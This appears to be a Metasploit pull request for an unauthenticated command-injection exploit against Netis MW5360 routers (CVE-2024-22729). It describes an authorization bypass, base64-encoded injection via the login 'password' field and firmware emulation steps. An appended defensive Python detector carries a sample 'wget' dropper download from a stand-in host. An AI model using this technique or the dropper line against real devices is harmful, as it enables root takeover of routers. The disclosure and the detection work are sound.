Netis MW5360 unauthenticated RCE [CVE-2024-22729] #19188
Dear Reviewers,

I did some extensive testing with other Netis router models and firmware versions. So I propose landing this one, because it has been disclosed and the chain of attack is different from what I found in my other research. I will submit another module after I have informed the vendor and followed the disclosure policy.
Netis router MW5360 has a command injection vulnerability via the `password` parameter on the login page.

The vulnerability stems from improper handling of the `password` parameter within the router's web interface. The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable. Attackers can inject a command in the `password` parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take full control of the router as user `root`.

The following Netis network products are vulnerable:
This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
Installation steps to emulate the router firmware with FirmAE

1. Install `FirmAE` on your Linux distribution using the installation instructions provided here.
2. `binwalk` might need to be able to handle a sasquatch filesystem, which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after your `FirmAE` installation, otherwise you will not be able to extract the firmware.
3. Download the firmware `MW5360-1.0.1.3442.bin` for the demonstration.
4. Run `./init.sh` to initialize and start the Postgres database.
5. Run `./run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin`
6. `ping` the emulated router and run `nmap` to check the ports.

You are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
Verification

1. Start `msfconsole`
2. `use exploit/linux/http/netis_unauth_rce_cve_2024_22729`
3. `set rhosts <ip-target>`
4. `set lhost <ip-attacker>`
5. `set target <0=Linux Dropper>`
6. `exploit`
7. You should get a `Meterpreter` session.

Scenarios
Netis MW5360 Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations

Staged payloads might core dump on the target, so use stageless payloads when using the Linux Dropper target.

Another limitation is that the router has a very limited command set that can be leveraged, so the only option is to use the `wget` command to drop an executable on the target to get a session. Chained command lines using `;` do not work, so each command needs to be executed in a separate request with a delay of 30 seconds or more to avoid session locking (see the `CMD_DELAY` option).

Last but not least, be mindful that the admin router password gets overwritten by the exploit, resulting in a clear indicator of compromise.
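A defender-side check for the request pattern described in this PR, added here as an example that is not part of the PR or the module: it decodes the base64 `password` parameter of login POSTs and flags shell-like content, and flags login POSTs that arrive without an `Authorization` header. The login path, the form-encoded request shape and the sample requests are constructed assumptions, not values taken from the module.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote

# Heuristic: shell metacharacters, or the one command the PR says the
# injection can leverage on this router (wget). Constructed, not from the module.
SUSPICIOUS = re.compile(r"[;&|`$()]|\bwget\b")


def decode_password(value: str):
    """Return the base64-decoded password text, or None if it is not valid base64."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def inspect_login(request: dict) -> list:
    """Return indicator strings for one captured login POST (empty list = clean).

    The request shape is an assumption: {"method", "path", "headers", "body"} with a
    form-encoded body and a path containing "login".
    """
    findings = []
    if request["method"] != "POST" or "login" not in request["path"].lower():
        return findings
    headers = {k.lower(): v for k, v in request["headers"].items()}
    if "authorization" not in headers:
        # The PR reports that login authorization is bypassed by dropping this header.
        findings.append("login POST without Authorization header")
    for pw in parse_qs(request["body"]).get("password", []):
        decoded = decode_password(pw)
        if decoded is not None and SUSPICIOUS.search(decoded):
            findings.append(f"base64 password decodes to shell-like content: {decoded!r}")
    return findings


def b64_form(value: bytes) -> str:
    """Base64-encode and URL-encode a value the way a form body would carry it."""
    return quote(base64.b64encode(value).decode(), safe="")


# Constructed sample traffic: a normal login, then one matching the reported pattern.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/login.cgi",
     "headers": {"Host": "192.168.1.1", "Authorization": "Basic REDACTED"},
     "body": "username=admin&password=" + b64_form(b"Welcome1")},
    {"method": "POST", "path": "/login.cgi",
     "headers": {"Host": "192.168.1.1"},
     "body": "username=admin&password=" + b64_form(b"wget http://203.0.113.7/dropper")},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, inspect_login(req) or "clean")
```

A legitimate password containing `$` or `(` will also trip the content heuristic, so treat a hit as a triage signal and pair it with the missing-header check and the admin-password-reset indicator noted above.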